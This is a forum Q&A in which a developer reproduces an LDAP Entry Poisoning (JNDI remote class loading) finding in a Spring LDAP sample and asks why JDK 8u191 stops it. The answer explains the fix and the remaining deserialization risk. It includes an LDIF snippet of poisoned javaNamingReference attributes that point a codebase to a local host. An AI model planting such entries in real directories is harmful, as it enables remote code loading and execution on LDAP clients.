# LDAP Entry Poisoning Fixed in jdk-8u191?

Tags: java, spring, security, spring-security, ldap

Fortify has reported an LDAP Entry Poisoning vulnerability in one of my Spring applications. You can get additional information on this vulnerability from the following links:

https://www.youtube.com/watch?v=Y8a5nB-vy78&feature=youtu.be&t=2111

https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf

I decided to try and prove for myself if this was still a vulnerability. I did this by using Spring Tool Suite:

file -> new -> import spring getting started content

searched for ldap
and imported the Authenticating Ldap -> complete code set

https://spring.io/guides/gs/authenticating-ldap/

I then added the following lines to the included test-server.ldif file to the entry for bob as well as the entry for developers:

```
javaFactory: PayloadObject
objectClass: javaNamingReference
javaCodebase: http://127.0.0.1:9999/
javaClassName: PayloadObject
```

In order to run this, I needed to add the following line to application.properties:

```
spring.ldap.embedded.validation.enabled=false
```

I started up Wireshark and ran the Spring sample app, and sure enough, when I logged in with bob, I got a hit in Wireshark on port 9999.

When I asked a co-worker to test the same thing, he was unable to reproduce. After some research, we discovered that he had a newer jdk than I, and after I updated my jdk, I, too, was unable to reproduce the issue.

We narrowed it down to jdk-8u191 was the version that introduced "the fix", but I can't find anything that explains why or how it was fixed in the java release notes.

My question is - is LDAP Entry Poisoning now a false/positive if we're running jdk-8u191 or newer? Or is there some configuration option that can be set to override this "fix"?

Answer (score 2, accepted):

[8u191 closed a remote class loading vulnerability](https://www.veracode.com/blog/research/exploiting-jndi-injections-java) in LDAP, though research is ongoing. Whenever you are turning a stream of bytes into an Object in Java, you want to think about class loading (what 8u191 addressed), but also insecure deserialization.

When CVEs are addressed, they are not typically in the release notes.

As for whether or not the alert from Fortify is a false positive, I think it is more important to assess the risk relative to your application.

To leverage this vulnerability, for example, the attacker would at least need [direct access to your LDAP instance](https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf) (see pg 31), which likely indicates a larger security issue. 8u191 and after, the attacker would additionally need to find a class in your classpath that is vulnerable to insecure deserialization to reproduce what the BH talk demonstrates.